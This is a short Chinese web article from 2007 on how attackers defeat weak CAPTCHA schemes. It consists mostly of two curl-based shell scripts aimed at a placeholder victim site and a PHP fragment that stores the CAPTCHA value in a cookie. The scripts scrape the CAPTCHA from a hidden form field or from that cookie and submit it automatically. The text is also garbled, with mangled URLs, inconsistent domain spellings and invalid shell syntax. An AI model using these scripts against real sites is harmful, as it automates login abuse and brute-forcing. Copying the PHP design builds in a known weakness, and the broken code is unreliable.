黑客技术 看看黑客如何破解验证码机制
2007-08-18 16:46:49 来源:WEB开发网核心提示: CODE:#!/bin/shcurl php" target="_blank">http://www.vicitm.org/authpage.phpauthinput=`grep '<input type=hidden name=authnum val
CODE:
#!/bin/sh
curl php" target="_blank">http://www.vicitm.org/authpage.php
authinput=`grep '<input type=hidden name=authnum value=[[:digit:]]{4}>' grep.txt | sed -e 's/[^0-9]//g'` #得到网页中的
authnum
curl php" target="_blank">http://www.vicitm.org/authpage.php -d name=hacker -d submit="验证" -d authnum=$authnum
CODE:
session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum);
...
<input type=text name=authnum maxlength=4><img src=get_code.php>
...
if($number != $login_check_number || empty($number))
{
print("校验码不正确!");
die();
}
第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。
CODE:
#!/bin/sh
$username=hacker
$password=hackme
curl php" target="_blank">http://www.vicitm.org/index.php -c common_cookie # 接受服务器的初始cookies
curl php" target="_blank">http://www.vicitm.org/get_code.php -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl php" target="_blank">http://www.victim.org/login.php -b $username.cook -d authnum=$authnum -d username=$username -d password=$password #
使用cookies中的验证码登陆
更高级的验证码。(好像本论坛的就是这种。。。。)
更多精彩
赞助商链接